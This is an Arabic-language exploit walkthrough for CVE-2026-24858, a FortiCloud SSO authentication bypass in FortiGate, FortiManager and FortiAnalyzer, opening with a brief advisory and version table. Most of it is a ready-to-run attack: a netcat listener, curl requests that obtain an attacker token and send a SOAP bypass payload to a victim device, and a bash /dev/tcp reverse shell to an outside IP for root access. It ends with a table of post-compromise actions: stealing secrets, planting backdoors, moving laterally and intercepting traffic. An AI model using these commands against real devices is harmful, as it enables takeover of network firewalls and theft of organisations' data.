
CVE-2026-24858 FortiCloud Single Sign On (SSO) ميزة مفعّلة افتراضيًا من المصنع بمجرد تسجيل أي FortiGate/FortiManager/FortiAnalyzer تحتوي على ثغرة حرجة في تجاوز المصادقة.
تعد ميزة تسجيل الدخول الموحد (SSO) في FortiCloud ميزة مفعّلة افتراضيًا من المصنع بمجرد تسجيل أي جهاز FortiGate/FortiManager/FortiAnalyzer، وتحتوي على ثغرة حرجة في تجاوز المصادقة.
يمكن للمهاجم الذي يمتلك أي حساب FortiCloud (مجاني أو مدفوع) إعادة استخدام رمز SSO الخاص به لتسجيل الدخول إلى أجهزة عملاء آخرين (الإصدارات المذكورة أدناه) دون معرفة كلمات المرور الخاصة بهم.
يمنح الاستغلال بعد الاختراق وصولًا كاملًا إلى واجهة الإدارة الرسومية وجذر الصدفة (root shell)، مما يسمح باعتراض حركة المرور، أو العبث بشبكات VPN، أو التحرك الجانبي داخل الشبكات الداخلية.
قم بالترقية فورًا أو عطّل FortiCloud SSO حتى يتم إصدار التصحيح.
| المنتج | البرنامج الثابت المعرض للخطر | الإصدار المصحح |
|---|
| FortiOS | 7.0.0–7.0.18, 7.2.0–7.2.12, 7.4.0–7.4.10, 7.6.0–7.6.5 | ≥ 7.0.19, ≥ 7.2.13, ≥ 7.4.11, ≥ 7.6.6 |
| FortiManager | 7.0.0–7.0.10, 7.2.0–7.2.5, 7.4.0–7.4.9 | نفس الإصدار الرئيسي/الفرعي +1 |
| FortiAnalyzer | نفس النطاقات | نفس الإصدار |
جهاز المهاجم
مستمع لصدفة عكسية:
nc -lvnp 4444
الحصول على رمز المهاجم (صلاحية 15 دقيقة)
curl -k -X POST https://customerapiauth.fortinet.com/api/v1/auth/token \
-H "Content-Type: application/json" \
-d '{"username":"[email protected]","password":"AttackerPass123"}'
الاستجابة (مقتطف):
{"access_token":"eyJ0eXAiOiJKV1QiLCJhbGc...","expires_in":900}
انسخ قيمة access_token.
بناء حمولة التجاوز
احفظها باسم bypass.xml:
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Body>
<authRequest>
<serialNumber>FGT80ETK21000000</serialNumber>
<token>eyJ0eXAiOiJKV1QiLCJhbGc...</token>
<action>login</action>
</authRequest>
</soapenv:Body>
</soapenv:Envelope>
الإرسال إلى الضحية (أي برنامج ثابت ≤ الجدول أعلاه)
curl -k -X POST https://<VICTIM-IP>:443/remote/logincheck \
-H "Content-Type: application/xml" \
--data @bypass.xml \
-c cookies.txt
HTTP 200 + Set-Cookie: APSCOOKIE=... → نجاح.
تصفح واجهة الإدارة الرسومية
افتح المتصفح أو استخدم curl مع ملف الكوكيز المحفوظ:
curl -k -b cookies.txt https://<VICTIM-IP>/ng/
→ تظهر لوحة التحكم دون طلب كلمة مرور.
جذر الصدفة (أداة CLI)
داخل الواجهة الرسومية: Dashboard → CLI Console
execute bash
bash-4.4# bash -i >& /dev/tcp/192.168.8.129/4444 0>&1
يستقبل المستمع:
root@FGT80ETK21000000:/#
| السيناريو | النتيجة |
|---|---|
| مسؤول للقراءة فقط | تصدير كامل التكوين (أسرار VPN، سياسات local-in، تجزئات المستخدمين). |
| مسؤول للكتابة | تعديل قواعد جدار الحماية، إنشاء مستخدمين محليين، تعطيل التسجيل، زرع سكربتات دائمة. |
| جذر الصدفة | تفريغ config.dat، استخراج مفاتيح HA، التنقل إلى الشبكات الفرعية الداخلية، زرع خدمة خلفية. |
| الحركة الجانبية | يصبح الجهاز نقطة انطلاق؛ شبكات VLAN وأنفاق SSL-VPN موثوقة → اختراق أعمق للشبكة. |
| سرقة البيانات | تمر جميع حركة المرور عبر FortiGate → بروكسي شفاف + حقن شهادات. |